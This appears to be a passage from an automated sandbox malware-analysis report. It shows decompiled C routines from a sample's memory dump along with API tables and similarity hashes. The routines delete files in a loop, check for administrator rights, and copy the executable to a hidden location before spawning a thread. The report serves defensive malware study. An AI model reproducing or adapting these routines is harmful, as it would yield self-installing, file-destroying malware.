						_t74 =  *_t89;
						_t89 = _t89 + 1;
					} while (_t74 != 0);
					_t147 = _t115;
					_t116 = _t89 - _t115;
					_t130 =  &_v300 - 1;
					do {
						_t91 =  *(_t130 + 1);
						_t130 = _t130 + 1;
					} while (_t91 != 0);
					_t93 = _t116 >> 2;
					_t56 = memcpy(_t130, _t147, _t93 << 2);
					memcpy(_t147 + _t93 + _t93, _t147, _t116 & 0x00000003);
					E00396570(2, _t56);
					_t157 = _t154 + 0x20;
					_t60 = FindFirstFileA( &_v300,  &_v620); // executed
					_t75 = _t60;
					if(_t75 != 0xffffffff) {
						_t118 =  *0x3ce1fc; // 0x80000000
						_v16 = _t118;
						asm("fild dword [ebp-0xc]");
						asm("fsubp st1, st0");
						do {
							 *0x3ce060 = ( *0x3ce060 & 0x0000ffff) - 0x76cf129e;
							_t64 =  &(_v620.cFileName);
							 *_v8 = 0;
							_t101 = _t64;
							do {
								_t119 =  *_t64;
								_t64 = _t64 + 1;
							} while (_t119 != 0);
							_t65 = _t64 - _t101;
							_t148 = _t101;
							_t137 =  &_v300 - 1;
							do {
								_t102 =  *(_t137 + 1);
								_t137 = _t137 + 1;
							} while (_t102 != 0);
							_t104 = _t65 >> 2;
							_t66 = memcpy(_t137, _t148, _t104 << 2);
							_v20 =  *0x3ce110 -  *0x3c7918;
							memcpy(_t148 + _t104 + _t104, _t148, _t66 & 0x00000003);
							_t157 = _t157 + 0x18;
							 *0x3ce3f0 =  *0x3ce3f0 * _v20;
							_t196 =  *0x3ce110 +  *0x3c75c8;
							 *0x3ce110 = _t196;
							DeleteFileA( &_v300);
							_t69 =  *0x3ce2c4; // 0x9cc1
							_v16 = _t69;
							asm("fild dword [ebp-0xc]");
							_v16 = _t196;
							asm("fsubr dword [ebp-0xc]");
							 *0x3ce2c4 = E0039CABC();
							_t187 =  *0x3ce0b0;
							asm("fld1");
							asm("faddp st1, st0");
							 *0x3ce0b0 = _t187; // executed
							_t71 = FindNextFileA(_t75,  &_v620); // executed
						} while (_t71 != 0);
						FindClose(_t75);
					}
					_t61 =  *0x3ce4b8; // 0x5ad7
					_v8 = _t61;
					asm("fild dword [ebp-0x4]");
					_v12 = _t187;
					_t117 =  *0x3ce3e8; // 0x80000000
					asm("fsubr qword [ebp-0x8]");
					_v8 = _t117;
					_v20 =  *0x3ce3b0;
					asm("fild dword [ebp-0x4]");
					_t43 = E0039CABC();
					 *0x3ce3e8 = _t43;
					 *0x3ce4b8 =  *0x3ce4b8 - 1;
				}
				return _t43;
			}

0x0038d849
0x0038d84e
0x0038d851
0x0038d85a
0x0038d863
0x0038d86a
0x0038d870
0x0038d873
0x0038d876
0x0038d879
0x0038d87c
0x0038d888
0x0038d88e
0x0038d8a2
0x0038d8a4
0x0038d8ac
0x0038d8be
0x0038d8c9
0x0038d8ce
0x0038d8df
0x0038d8e5
0x0038d8eb
0x0038d8ee
0x0038d8f5
0x0038d8f8
0x0038d8f8
0x0038d8fa
0x0038d8fb
0x0038d8ff
0x0038d907
0x0038d90d
0x0038d910
0x0038d913
0x0038d91d
0x0038d920
0x0038d92c
0x0038d938
0x0038d93e
0x0038d944
0x0038d94a
0x0038d951
0x0038d954
0x0038d957
0x0038d95c
0x0038d960
0x0038d960
0x0038d962
0x0038d963
0x0038d96f
0x0038d971
0x0038d973
0x0038d974
0x0038d974
0x0038d977
0x0038d978
0x0038d97e
0x0038d98f
0x0038d996
0x0038d998
0x0038d99b
0x0038d9a0
0x0038d9a0
0x0038d9a2
0x0038d9a3
0x0038d9af
0x0038d9b1
0x0038d9b3
0x0038d9b4
0x0038d9b4
0x0038d9b7
0x0038d9b8
0x0038d9be
0x0038d9c1
0x0038d9cb
0x0038d9cd
0x0038d9d2
0x0038d9e3
0x0038d9e9
0x0038d9ee
0x0038d9fa
0x0038da00
0x0038da03
0x0038da06
0x0038da10
0x0038da1f
0x0038da25
0x0038da2b
0x0038da2e
0x0038da30
0x0038da30
0x0038da32
0x0038da33
0x0038da3d
0x0038da3f
0x0038da41
0x0038da42
0x0038da42
0x0038da45
0x0038da46
0x0038da58
0x0038da5b
0x0038da5d
0x0038da6e
0x0038da6e
0x0038da70
0x0038da7c
0x0038da82
0x0038da8f
0x0038da95
0x0038da9e
0x0038daa1
0x0038daa4
0x0038daad
0x0038dab5
0x0038dabb
0x0038dac1
0x0038dac9
0x0038dacd
0x0038dad3
0x0038dad9
0x0038dae2
0x0038dae2
0x0038dae8
0x0038daf1
0x0038daf4
0x0038daf7
0x0038db00
0x0038db06
0x0038db09
0x0038db0c
0x0038db0f
0x0038db15
0x0038db1b
0x0038db20
0x0038db27
0x0038db2c

APIs

Sleep.KERNELBASE(000003E8,?,00000000), ref: 0038D944
FindFirstFileA.KERNELBASE(?,?,?,?,00000000,74CB4EE0,?,00000000), ref: 0038D9E3
DeleteFileA.KERNELBASE(?,?,?,00000000,74CB4EE0,?,00000000), ref: 0038DA8F
FindNextFileA.KERNELBASE(00000000,?,?,?,00000000,74CB4EE0,?,00000000), ref: 0038DAD3
FindClose.KERNEL32(00000000,?,?,00000000,74CB4EE0,?,00000000), ref: 0038DAE2

Strings

7i\, xrefs: 0038D888

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: FileFind$CloseDeleteFirstNextSleep
String ID: 7i\
API String ID: 1528862845-1329047267
Opcode ID: 94e4b997e1c69a4972b2bb0bfaa2ff933a9b9c1ed6850010d363102f46c17150
Instruction ID: 5a450c3296e1af4caf88f9dbe83d7a515ae20660d671c5e03aeca8fe61765095
Opcode Fuzzy Hash: 94e4b997e1c69a4972b2bb0bfaa2ff933a9b9c1ed6850010d363102f46c17150
Instruction Fuzzy Hash: 73812934900619DBCB0A9F65FC98AED7BB9FF89310F1185D9D881E32A4DF352A64CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00391CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00391CA0() {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				long long _v20;
				short _v24;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				intOrPtr _t14;
				int _t15;
				void* _t17;
				long long _t28;

				_t28 =  *0x3ce1b0 +  *0x3c75c8;
				 *0x3ce1b0 = _t28;
				_t14 =  *0x3ce0c0; // 0x5f5af227
				_v16 = _t14;
				asm("fild dword [ebp-0xc]");
				_v20 = _t28;
				 *0x3ce518 =  *0x3ce1b0 + _v20 -  *0x3c7858;
				 *0x3ce0c0 =  *0x3ce0c0 + 1;
				_v28.Value = 0;
				_v24 = 0x500;
				 *0x3ce174 =  *0x3ce174 + 0xaa81dba0;
				_t15 = AllocateAndInitializeSid( &_v28, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t15;
				if(_t15 != 0) {
					_t10 =  &_v8; // 0x385323
					_t17 =  *0x3d02ec(0, _v12, _t10); // executed
					if(_t17 == 0) {
						_v8 = 0;
					}
					FreeSid(_v12);
					_t13 =  &_v8; // 0x385323
					return  *_t13;
				}
				return _t15;
			}

0x00391cad
0x00391cb9
0x00391cbf
0x00391cc6
0x00391cc9
0x00391ccf
0x00391cef
0x00391cf5
0x00391cfb
0x00391cfe
0x00391d04
0x00391d0e
0x00391d14
0x00391d19
0x00391d1e
0x00391d24
0x00391d2c
0x00391d2e
0x00391d2e
0x00391d35
0x00391d3b
0x00000000
0x00391d3b
0x00391d42

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00391D0E
CheckTokenMembership.KERNELBASE(00000000,?,#S8), ref: 00391D24
FreeSid.ADVAPI32(?), ref: 00391D35

Strings

#S8, xrefs: 00391D1E, 00391D3B, 00391D21

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID: #S8
API String ID: 3429775523-2094962594
Opcode ID: 21c69e96ed85b5336a4855c032a239b9ede77b0ffa385217eeeabac13eae95e7
Instruction ID: aba19413408492db382c144d5465f6b92231863da77e8d0ba5f2ba28619dccd5
Opcode Fuzzy Hash: 21c69e96ed85b5336a4855c032a239b9ede77b0ffa385217eeeabac13eae95e7
Instruction Fuzzy Hash: 171148B5901209EFDB01DFE1EDC8EBEBB7CFB08704F508889E601A2190DB302A14DB65

Uniqueness

Uniqueness Score: -1.00%

Function 003836C9 Relevance: 39.6, APIs: 26, Instructions: 623
sleepfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E003836C9() {
				signed char _t121;
				void* _t123;
				void* _t127;
				intOrPtr _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				void* _t133;
				signed int _t135;
				void* _t136;
				signed int _t142;
				short _t144;
				signed char _t147;
				intOrPtr* _t150;
				intOrPtr* _t154;
				intOrPtr* _t155;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				void* _t165;
				unsigned int _t166;
				void* _t169;
				unsigned int _t170;
				signed int _t171;
				signed int _t175;
				short _t176;
				intOrPtr _t177;
				signed int _t178;
				signed int _t180;
				void* _t186;
				unsigned int _t187;
				void* _t190;
				signed char _t194;
				void* _t197;
				void* _t198;
				void* _t206;
				int _t214;
				int _t218;
				signed int _t223;
				void* _t226;
				struct HINSTANCE__* _t228;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				CHAR* _t240;
				CHAR* _t246;
				signed int _t247;
				signed int _t255;
				intOrPtr _t257;
				signed int _t261;
				struct HINSTANCE__* _t262;
				void* _t265;
				CHAR* _t266;
				void* _t267;
				void* _t269;
				void _t271;
				signed int _t273;
				intOrPtr _t278;
				intOrPtr _t279;
				signed int _t281;
				signed int _t285;
				char _t286;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				void* _t291;
				signed int _t294;
				int _t297;
				void* _t299;
				signed int _t300;
				signed int _t302;
				int _t305;
				intOrPtr _t307;
				void* _t310;
				void* _t312;
				signed int _t313;
				signed int _t315;
				int _t318;
				intOrPtr _t321;
				intOrPtr _t326;
				intOrPtr _t329;
				CHAR* _t332;
				struct HINSTANCE__* _t333;
				intOrPtr _t334;
				struct HINSTANCE__* _t337;
				void _t338;
				signed int _t339;
				signed int _t340;
				signed int _t342;
				intOrPtr _t343;
				struct HINSTANCE__* _t345;
				signed int _t347;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				signed int _t355;
				signed int _t356;
				struct HINSTANCE__* _t360;
				signed int _t361;
				intOrPtr _t363;
				intOrPtr _t365;
				intOrPtr _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				signed int _t375;
				intOrPtr _t377;
				struct HINSTANCE__* _t378;
				intOrPtr _t379;
				char* _t381;
				void* _t383;
				void* _t390;
				void* _t396;
				void* _t400;
				void* _t402;
				void* _t406;
				void* _t410;
				signed int _t411;
				void* _t413;
				void* _t414;
				signed int _t415;
				void* _t416;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t427;
				void* _t428;
				void* _t429;
				void* _t430;
				void* _t431;
				void* _t432;
				void* _t433;
				void* _t434;
				void* _t435;
				void* _t437;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t449;
				void* _t450;
				void* _t453;
				void* _t454;
				void* _t462;
				void* _t464;
				signed long long _t466;
				signed long long _t471;
				signed long long _t473;
				signed long long _t477;
				signed long long _t480;
				signed long long _t493;
				signed long long _t512;

				while(1) {
					_t343 =  *0x3d050c; // 0x2d81058
					_t135 = E00392E30(_t343);
					_t428 = _t427 + 4;
					__eflags = _t135;
					if(_t135 == 0) {
						goto L28;
					}
					L27:
					_t257 =  *0x3d050c; // 0x2d81058
					 *0x3ce4b0 =  *0x3ce4b0 +  *0x3c81f0;
					E003896D0(_t412, _t257);
					_t427 = _t428 + 4;
					_t471 =  *0x3ce4d8 +  *0x3c81e8 -  *0x3c81e0;
					asm("fsubp st1, st0");
					 *0x3ce098 = _t471;
					Sleep(0x7d0);
					_t412 =  &(_t412[0]);
					__eflags = _t412 - 0xa;
					if(_t412 < 0xa) {
						while(1) {
							_t343 =  *0x3d050c; // 0x2d81058
							_t135 = E00392E30(_t343);
							_t428 = _t427 + 4;
							__eflags = _t135;
							if(_t135 == 0) {
								goto L28;
							}
							goto L27;
						}
					}
					L28:
					_t136 = E0039CDD8(_t343, _t266, _t420 - 0x50);
					_t429 = _t428 + 8;
					 *0x3ce498 = 0x6f4abbb1;
					__eflags =  *((intOrPtr*)(_t420 - 0x3c)) -  *((intOrPtr*)(_t420 - 0x1c));
					if(__eflags != 0) {
						L30:
						GetModuleFileNameA(0, _t420 - 0x580, 0x200);
						SetFileAttributesA(_t266, 0x80);
						_t471 =  *0x3ce314 -  *0x3c81d8;
						 *0x3ce314 = _t471;
						CopyFileA(_t420 - 0x580, _t266, 0);
						_t412 = E0038CF90(__eflags, _t471, 0xfe5, 0xa);
						_t142 = E00396AA0(_t266, _t141);
						_t388 = _t142;
						E00396570(0xa, _t141);
						_t429 = _t429 + 0x18;
						__eflags = _t142;
						if(__eflags != 0) {
							L33:
							_t144 =  *0x3ce180; // 0x7246
							_t285 = _t144 + 0x78fc3db0;
							__eflags = _t285;
							 *0x3ce0c4 = _t285;
							_push(0x80);
							L34:
							SetFileAttributesA(_t266, ??);
							L35:
							E00386260(_t471, _t266, 0);
							_t345 =  *0x3ce3ec; // 0x80000000
							 *(_t420 - 4) = _t345;
							asm("fild dword [ebp-0x4]");
							_t430 = _t429 + 8;
							 *(_t420 - 0x10) = _t471;
							_t473 =  *0x3ce1b8;
							_t147 =  *0x3ce4d4; // 0x84901a2a
							 *(_t420 - 4) = _t147;
							asm("fild dword [ebp-0x4]");
							asm("fsubp st1, st0");
							asm("fcomp qword [ebp-0x10]");
							asm("fnstsw ax");
							__eflags = _t147 & 0x00000001;
							if((_t147 & 0x00000001) == 0) {
								_t334 =  *0x3ce1f8; // 0x3e6
								_t377 =  *0x3ce478; // 0x80000000
								_t378 = _t377 + _t334;
								__eflags = _t378;
								 *(_t420 - 4) = _t378;
								asm("fild dword [ebp-0x4]");
								 *0x3ce1b8 = _t473;
							}
							E0039DF62(0);
							_t150 = E00394820(GetCommandLineA());
							_t431 = _t430 + 4;
							_t347 = _t420 - 0x280 - _t150;
							__eflags = _t347;
							do {
								_t286 =  *_t150;
								 *(_t150 + _t347) = _t286;
								_t150 = _t150 + 1;
								__eflags = _t286;
							} while (_t286 != 0);
							 *(_t420 - 0x280) = _t286;
							GetModuleFileNameA(0, _t420 - 0x280, 0x200);
							E003C2BB6(_t420 - 0x280);
							_t154 =  *0x3d0494; // 0x2d81088
							_t432 = _t431 + 4;
							_t349 = _t420 - 0x68 - _t154;
							__eflags = _t349;
							do {
								_t288 =  *_t154;
								 *((char*)(_t154 + _t349)) = _t288;
								_t154 = _t154 + 1;
								__eflags = _t288;
							} while (_t288 != 0);
							_t155 =  *0x3d031c; // 0x2d810d8
							_t351 = _t420 - 0x80 - _t155;
							__eflags = _t351;
							do {
								_t289 =  *_t155;
								 *((char*)(_t155 + _t351)) = _t289;
								_t155 = _t155 + 1;
								__eflags = _t289;
							} while (_t289 != 0);
							E003C2BB6(_t420 - 0x68);
							E003C2BB6(_t420 - 0x80);
							_t433 = _t432 + 8;
							__eflags =  *0x3d02d4;
							if(__eflags != 0) {
								L52:
								_t353 = _t420 - 0x280;
								_push(_t353);
								_t159 = E0038DB70(__eflags, _t473);
								_t434 = _t433 + 4;
								__eflags = _t159 - 1;
								if(__eflags > 0) {
									asm("fld1");
									asm("faddp st2, st0");
									asm("fxch st0, st1");
									 *0x3ce488 = st0;
									 *(_t420 - 0x10) =  *0x3ce488;
									_t473 =  *0x3ce39c;
									_t228 =  *0x3ce140; // 0x5ea6
									asm("fsubr qword [ebp-0x10]");
									 *(_t420 - 4) = _t228;
									 *(_t420 - 0x10) = _t473;
									asm("fild dword [ebp-0x4]");
									asm("fsubr qword [ebp-0x10]");
									 *0x3ce4c4 = E0039CABC();
									asm("fsubr dword [0x3ce39c]");
									 *0x3ce39c = _t473;
									E0039DF62(0);
								}
								E00395410(_t388, _t412, __eflags, _t473);
								 *(_t420 - 0x10) =  *0x3ce5e4 -  *0x3c81d4;
								_t477 =  *0x3ce590 +  *(_t420 - 0x10);
								 *0x3ce590 = _t477;
								_t162 = E0039B950(0);
								 *0x3d04cc = _t353;
								 *0x3d04c8 = _t162;
								E00386790(_t420 - 0x580);
								_t435 = _t434 + 4;
								_t164 = 0;
								__eflags = 0;
								do {
									_t290 =  *((intOrPtr*)(_t420 + _t164 - 0x580));
									 *((char*)(_t164 + 0x3cfca0)) = _t290;
									_t164 = _t164 + 1;
									__eflags = _t290;
								} while (_t290 != 0);
								_t165 =  *0x3d04b0; // 0x2d81180
								_t291 = _t165;
								do {
									_t355 =  *_t165;
									_t165 = _t165 + 1;
									__eflags = _t355;
								} while (_t355 != 0);
								_t166 = _t165 - _t291;
								_t413 = _t291;
								_t390 = 0x3cfc9f;
								__eflags = 0x3cfca0;
								do {
									_t79 = _t390 + 1; // 0x0
									_t390 = _t390 + 1;
									__eflags =  *_t79;
								} while ( *_t79 != 0);
								_t294 = _t166 >> 2;
								_t297 = memcpy(_t390, _t413, _t294 << 2) & 0x00000003;
								__eflags = _t297;
								_t169 = memcpy(_t413 + _t294 + _t294, _t413, _t297);
								_t437 = _t435 + 0x18;
								_t299 = _t169;
								do {
									_t356 =  *_t169;
									_t169 = _t169 + 1;
									__eflags = _t356;
								} while (_t356 != 0);
								_t170 = _t169 - _t299;
								_t414 = _t299;
								_t396 = _t420 - 0x57f;
								__eflags = _t396;
								do {
									_t300 =  *(_t396 + 1);
									_t396 = _t396 + 1;
									__eflags = _t300;
								} while (_t300 != 0);
								_t302 = _t170 >> 2;
								_t171 = memcpy(_t396, _t414, _t302 << 2);
								_t305 = _t171 & 0x00000003;
								memcpy(_t414 + _t302 + _t302, _t414, _t305);
								_t439 = _t437 + 0x18;
								_t400 = _t414 + _t305 + _t305;
								__eflags =  *0x3d02e8(0x202, _t420 - 0x710);
								if(__eflags != 0) {
									_t226 = E0038CF90(__eflags, _t477, 0x382b, 0xb);
									_t439 = _t439 + 8;
									_push(_t226);
									E00392CC0();
								}
								_t307 =  *0x3d050c; // 0x2d81058
								_t357 = _t420 - 0x280;
								_t175 = E00396AA0(_t420 - 0x280, _t307);
								_t440 = _t439 + 8;
								__eflags = _t175;
								if(__eflags == 0) {
									 *(_t420 - 0x10) =  *0x3ce074;
									asm("fsubr qword [ebp-0x10]");
									asm("fsubp st1, st0");
									 *0x3ce1b8 =  *0x3ce000;
									_t487 =  *0x3ce074;
									asm("fld1");
									asm("fsubp st1, st0");
									_t223 = E00396710(_t266, _t400, _t414, __eflags);
									__eflags = _t223;
									if(_t223 == 0) {
										E0039DF62(_t223);
									}
									E00384510(_t357, _t487);
									 *(_t420 - 0x10) =  *0x3ce0a4;
									_t477 =  *0x3ce490;
									asm("fsubr qword [ebp-0x10]");
									 *0x3ce0a4 = _t477;
								}
								_t176 =  *0x3ce180; // 0x7246
								 *(_t420 - 4) = 0xc122fa40 - _t176;
								asm("fild dword [ebp-0x4]");
								 *0x3ce510 = _t477;
								 *0x3ce180 =  *0x3ce180 + 1;
								_t177 =  *0x3d050c; // 0x2d81058
								_t178 = E00396AA0(_t420 - 0x280, _t177);
								_t441 = _t440 + 8;
								__eflags = _t178;
								if(_t178 != 0) {
									L78:
									_t415 = 0;
									__eflags = 0;
									while(1) {
										_t360 =  *0x3ce020; // 0x829
										 *(_t420 - 4) = _t360;
										asm("fild dword [ebp-0x4]");
										 *(_t420 - 0x10) = _t477;
										_t310 =  *0x3d04b0; // 0x2d81180
										_t477 =  *0x3ce200 +  *(_t420 - 0x10);
										 *0x3ce200 = _t477;
										_t180 = E00392E30(_t310);
										_t442 = _t441 + 4;
										__eflags = _t180;
										if(__eflags == 0) {
											break;
										}
										_t368 =  *0x3d04b0; // 0x2d81180
										E003896D0(_t415, _t368);
										_t441 = _t442 + 4;
										Sleep(0x7d0);
										_t415 = _t415 + 1;
										__eflags = _t415 - 0xa;
										if(__eflags < 0) {
											continue;
										}
										break;
									}
									SetFileAttributesA(0x3cfca0, 0x80);
									CopyFileA(_t420 - 0x280, 0x3cfca0, 0);
									SetFileAttributesA(0x3cfca0, 2);
									E00396330(__eflags, _t420 - 0x580);
									_t186 = E0038CF90(__eflags, _t477, 0x30b4, 0x1f);
									_t267 = _t186;
									_t312 = _t186;
									do {
										_t361 =  *_t186;
										_t186 = _t186 + 1;
										__eflags = _t361;
									} while (_t361 != 0);
									_t187 = _t186 - _t312;
									_t416 = _t312;
									_t402 = _t420 - 0x57f;
									__eflags = _t402;
									do {
										_t313 =  *(_t402 + 1);
										_t402 = _t402 + 1;
										__eflags = _t313;
									} while (__eflags != 0);
									_t315 = _t187 >> 2;
									_t318 = memcpy(_t402, _t416, _t315 << 2) & 0x00000003;
									memcpy(_t416 + _t315 + _t315, _t416, _t318);
									_t406 = _t416 + _t318 + _t318;
									_t190 = E0038CF90(__eflags, _t477, 0x29a1, 3);
									E00396570(0x1f, _t267);
									E0039D699(_t420 - 0x580, _t190);
									E00396570(3, _t190);
									_t194 =  *0x3ce51c; // 0xaae
									_t480 =  *0x3ce520 -  *0x3c81d0;
									 *(_t420 - 4) = _t194;
									 *(_t420 - 0x10) = _t480;
									asm("fild dword [ebp-0x4]");
									asm("fcomp qword [ebp-0x10]");
									asm("fnstsw ax");
									__eflags = _t194 & 0x00000005;
									if((_t194 & 0x00000005) == 0) {
										_t480 =  *0x3ce5b8 -  *0x3c81c8;
										 *0x3ce5b8 = _t480;
									}
									_t363 =  *0x3cfb04; // 0x708
									_push(_t363);
									E00389970(_t267, _t406, _t420 - 0x580);
									_t197 = E0038CF90(__eflags, _t480, 0x3f8d, 8);
									_t198 = E0038CF90(__eflags, _t480, 0x159f, 0x1f);
									_t321 =  *0x3ce2fc; // 0x3a84af9e
									 *(_t420 - 4) = _t321 + 0x1b342e2e;
									asm("fild dword [ebp-0x4]");
									_push(_t420 - 0x280);
									 *(_t420 - 0x10) = _t480;
									 *0x3ce0a0 =  *0x3ce0a0 +  *(_t420 - 0x10);
									 *0x3ce2fc =  *0x3ce2fc - 1;
									E0039E0C2(0x3d0518, 0x21c, _t197, _t198);
									E00396570(8, _t197);
									E00396570(0x1f, _t198);
									E00386260( *0x3ce0a0 +  *(_t420 - 0x10), 0x3cfca0, 0x3d0518);
									E0039C990(_t420 - 0x280, 0, 0x200);
									E0039C990(_t420 - 0x580, 0, 0x300);
									_t206 = CreateThread(0, 0, E0038BFF0, 0, 0, 0);
									__eflags =  *0x3d030c;
									 *0x3d047c = _t206;
									if( *0x3d030c != 0) {
										_t365 =  *0x3ce598; // 0xc37b
										_t366 =  *0x3ce264; // 0x80000000
										_t367 = _t366 + 0x85983389 - _t365;
										__eflags = _t367;
										 *0x3ce558 = _t367;
										E0038CDB0();
									}
									L89:
									Sleep(0xc350);
									goto L89;
								} else {
									_t369 =  *0x3cfc7c; // 0x0
									CloseHandle(_t369);
									SetFileAttributesA(_t420 - 0x580, 0x80);
									_t214 = CopyFileA(_t420 - 0x280, _t420 - 0x580, 0);
									__eflags = _t214;
									if(_t214 == 0) {
										L77:
										_t326 =  *0x3d0284; // 0x490
										E0038F090(_t477, _t326);
										_t441 = _t441 + 4;
										E0039DF62(0);
										goto L78;
									}
									_t218 = SetFileAttributesA(_t420 - 0x580, 2);
									__eflags =  *0x3d030c;
									if( *0x3d030c == 0) {
										L75:
										E00386A90(_t420 - 0x580);
										_t449 = _t441 + 4;
										L76:
										Sleep(0x3e8);
										E00386260(_t477, _t420 - 0x580, 0);
										_t441 = _t449 + 8;
										goto L77;
									}
									E0039B350(_t218, _t420 - 0x580);
									_t441 = _t441 + 4;
									__eflags =  *0x3d030c;
									if( *0x3d030c == 0) {
										goto L75;
									}
									__eflags =  *0x3d076c - 6;
									if( *0x3d076c >= 6) {
										goto L76;
									}
									goto L75;
								}
							}
							_t329 =  *0x3d050c; // 0x2d81058
							_t231 = E00396AA0(_t420 - 0x280, _t329);
							_t433 = _t433 + 8;
							__eflags = _t231;
							if(__eflags != 0) {
								goto L52;
							}
							_t233 = E00396AA0(_t420 - 0x280, _t420 - 0x68);
							_t433 = _t433 + 8;
							__eflags = _t233;
							if(__eflags != 0) {
								goto L52;
							}
							_t235 = E00396AA0(_t420 - 0x280, _t420 - 0x80);
							_t433 = _t433 + 8;
							__eflags = _t235;
							if(__eflags != 0) {
								goto L52;
							}
							E00384070(_t473, _t420 - 0x280,  *((intOrPtr*)(_t420 - 0x1c))); // executed
							_t450 = _t433 + 8; // executed
							E0038D840(_t473); // executed
							__eflags =  *0x3d02e4;
							if(__eflags == 0) {
								E0039DF62(0);
								_t266 = _t265 + 1;
								_t381 = E00396AA0(_t266, E0038CF90(_t454, _t466, 0x1593, 2));
								E00396570(2, _t118);
								_t422 = _t421 + 0x18;
								_t455 = _t381;
								if(_t381 == 0) {
									E0039DF62(_t381);
								}
								 *_t381 = 0;
								_t121 = E00396330(_t455, _t420 - 0x580);
								_t337 =  *0x3ce00c; // 0x640f69c6
								 *(_t420 - 4) = _t337;
								asm("fild dword [ebp-0x4]");
								_t423 = _t422 + 4;
								 *(_t420 - 0x10) = _t466;
								asm("fucompp");
								asm("fnstsw ax");
								_t470 =  *0x3ce540;
								asm("fld1");
								asm("faddp st1, st0");
								_t456 = _t121 & 0x00000044;
								if((_t121 & 0x00000044) == 0) {
									_t262 =  *0x3ce1c0; // 0xa815
									 *(_t420 - 4) = _t262;
									_t512 =  *0x3ce354 +  *0x3c820c -  *0x3c8208;
									 *(_t420 - 0x10) = _t512;
									asm("fild dword [ebp-0x4]");
									_t470 = _t512 +  *(_t420 - 0x10);
									 *0x3ce1c0 = E0039CABC();
								}
								_t269 = E0038CF90(_t456, _t470, 0x30b4, 0x1f);
								_t424 = _t423 + 8;
								_t410 = _t269;
								do {
									_t338 =  *_t269;
									_t269 = _t269 + 1;
								} while (_t338 != 0);
								_t339 = _t269 - _t410;
								_t383 = _t420 - 0x57f;
								do {
									_t271 =  *(_t383 + 1);
									_t383 = _t383 + 1;
								} while (_t271 != 0);
								_t273 = _t339 >> 2;
								_t123 = memcpy(_t383, _t410, _t273 << 2);
								memcpy(_t410 + _t273 + _t273, _t410, _t339 & 0x00000003);
								E00396570(0x1f, _t123);
								_t340 =  *0x3ce5dc; // 0x12a4
								_t278 =  *0x3ce588; // 0xb5d5
								_t279 =  *0x3ce34c; // 0xc60d09f3
								_t127 = _t340 + _t278;
								 *0x3cfb04 = 0x708;
								_t14 = _t127 + 0x5ece6a44; // 0x124db7437
								_t342 = _t279 + _t14;
								 *0x3ce5dc = _t342;
								 *0x3ce34c =  *0x3ce34c - 1;
								_t427 = _t424 + 0x20;
								_t388 = 0;
								while(1) {
									_t128 =  *0x3d050c; // 0x2d81058
									_t129 = E00392E30(_t128);
									_t427 = _t427 + 4;
									if(_t129 != 0) {
										_t342 = _t420 - 0x580;
										_t130 = E0039CDD8(_t342, _t342, _t420 - 0x50);
										_t427 = _t427 + 8;
										__eflags = _t130;
										if(_t130 != 0) {
											Sleep(0xd05);
											_t261 = E0039CDD8(_t342, _t420 - 0x580, _t420 - 0x50);
											_t427 = _t427 + 8;
											__eflags = _t261;
											if(_t261 != 0) {
												 *(_t420 - 0x30) = _t388;
												 *(_t420 - 0x2c) = _t388;
											}
											 *0x3ce270 =  *0x3ce270 +  *0x3c8200;
										}
									} else {
										 *(_t420 - 0x30) = _t388;
										 *(_t420 - 0x2c) = _t388;
									}
									_t132 = E0039B950(0);
									_t281 =  *(_t420 - 0x2c);
									_t411 =  *(_t420 - 0x30);
									_t462 = _t342 - _t281;
									if(_t462 <= 0 && (_t462 < 0 || _t132 < _t411)) {
										_t132 = _t411 + 0x76c;
										_t342 = _t281;
										asm("adc edx, edi");
									}
									_t133 = _t132 - _t411;
									asm("sbb edx, ecx");
									_t464 = _t342 - _t388;
									if(_t464 > 0 || _t464 >= 0 && _t133 > 0x762) {
										break;
									}
									 *(_t420 - 0x10) =  *0x3ce5e4;
									 *0x3ce5e4 =  *0x3ce39c *  *(_t420 - 0x10);
									asm("fld1");
									asm("faddp st1, st0");
									Sleep(0x3e8);
									 *(_t420 - 0x10) =  *0x3ce2a8;
									asm("fsubr qword [ebp-0x10]");
									 *0x3ce2a8 =  *0x3ce50c -  *0x3c81f8;
									asm("fld1");
									asm("faddp st1, st0");
